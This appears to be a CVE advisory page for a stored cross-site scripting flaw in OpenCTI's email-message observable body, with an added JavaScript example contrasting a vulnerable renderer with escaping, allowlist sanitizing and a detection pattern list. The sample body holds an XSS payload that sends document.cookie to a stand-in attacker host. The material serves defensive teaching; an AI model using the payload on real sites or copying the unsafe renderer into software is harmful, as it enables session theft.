XSS Vulnerability in OpenCTI Platform by OpenCTI
CVE-2026-35212
5.3 MEDIUM
What is CVE-2026-35212?
OpenCTI is an open-source platform for managing cyber threat intelligence. In versions prior to 7.260227.0, the body of an email-message observable is not adequately sanitized before it is rendered, so an attacker who can get an email-message observable with a crafted body into the platform can have script from that body execute in the browser of any user who views the observable (cross-site scripting). Exploitation requires user interaction, because a victim has to open the crafted observable. Once running in the victim's session, the script can issue requests to the platform on the victim's behalf (a CSRF-style abuse of the authenticated session) and exfiltrate session data, which in a shared threat-intelligence platform can lead to large-scale session theft. The issue is fixed in version 7.260227.0; users should upgrade to that version or later.
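The class of rendering mistake this advisory describes, shown next to two safe renderings and a triage check, as an added JavaScript example (OpenCTI's front end is JavaScript/TypeScript). This is not OpenCTI's code and does not reproduce its actual rendering path; the observable field names, the sample body and the payloads in it are constructed for illustration.

```javascript
// Added example, not OpenCTI's own code. It shows, in the abstract, why an
// unsanitized email-message observable body is an XSS sink, two ways to
// render it safely, and a heuristic for finding payloads already stored on
// an instance that cannot be upgraded yet. The object shape below is an
// assumption made for the example, not OpenCTI's data model.

// Constructed sample: an email-message observable whose body carries two
// script payloads alongside benign text.
const sampleObservable = {
  entity_type: 'Email-Message',
  subject: 'Invoice overdue',
  body: 'Hello,<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">' +
        ' see the attached invoice.<script>alert(document.domain)</script>',
};

// VULNERABLE pattern: the body is concatenated into page markup verbatim, so
// the <img onerror> and <script> above run in the viewing user's browser
// with that user's session.
function renderUnsafe(observable) {
  return `<div class="email-body">${observable.body}</div>`;
}

// Safe pattern 1: treat the body as text. Every HTML metacharacter is
// escaped, so the browser displays the payload instead of executing it.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, (c) => map[c]);
}
function renderEscaped(observable) {
  return `<div class="email-body">${escapeHtml(observable.body)}</div>`;
}

// Safe pattern 2: escape everything, then restore only bare formatting tags
// from a fixed allowlist. A restored tag must match exactly "<b>" or "</b>"
// with no attributes, so event handlers, src= and href= values can never
// survive. (In a real React/Node code base a maintained sanitizer such as
// DOMPurify is the better choice; this shows the principle offline.)
const ALLOWED_TAGS = ['b', 'i', 'em', 'strong', 'p', 'br'];
function sanitizeAllowlist(text) {
  let out = escapeHtml(text);
  for (const tag of ALLOWED_TAGS) {
    const re = new RegExp(`&lt;(/?)${tag}&gt;`, 'gi');
    out = out.replace(re, `<$1${tag}>`);
  }
  return out;
}
function renderSanitized(observable) {
  return `<div class="email-body">${sanitizeAllowlist(observable.body)}</div>`;
}

// Triage heuristic for stored bodies on an unpatched instance: returns the
// names of script-bearing markup patterns found in a body. It is deliberately
// broad and will also flag some legitimate HTML mail, so review hits by hand.
const SUSPICIOUS_PATTERNS = {
  script_tag: /<\s*script\b/i,
  active_element: /<\s*(iframe|object|embed|svg|math|meta|link|base)\b/i,
  event_handler: /\son[a-z]+\s*=/i,
  javascript_url: /javascript\s*:/i,
  data_html_url: /data\s*:\s*text\/html/i,
};
function flagSuspiciousBody(body) {
  return Object.entries(SUSPICIOUS_PATTERNS)
    .filter(([, re]) => re.test(body))
    .map(([name]) => name);
}

// Stand-alone demonstration of the three renderings and the triage check.
console.log('unsafe    :', renderUnsafe(sampleObservable));
console.log('escaped   :', renderEscaped(sampleObservable));
console.log('sanitized :', renderSanitized(sampleObservable));
console.log('flags     :', flagSuspiciousBody(sampleObservable.body));
```

The escape-then-restore approach in `sanitizeAllowlist` is chosen over a tag-stripping regex because stripping leaves the door open to malformed or nested markup that a browser repairs into an executable element; with escaping as the default, the only markup that can reach the DOM is the handful of exact strings the loop puts back.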
Affected Version(s)
opencti < 7.260227.0
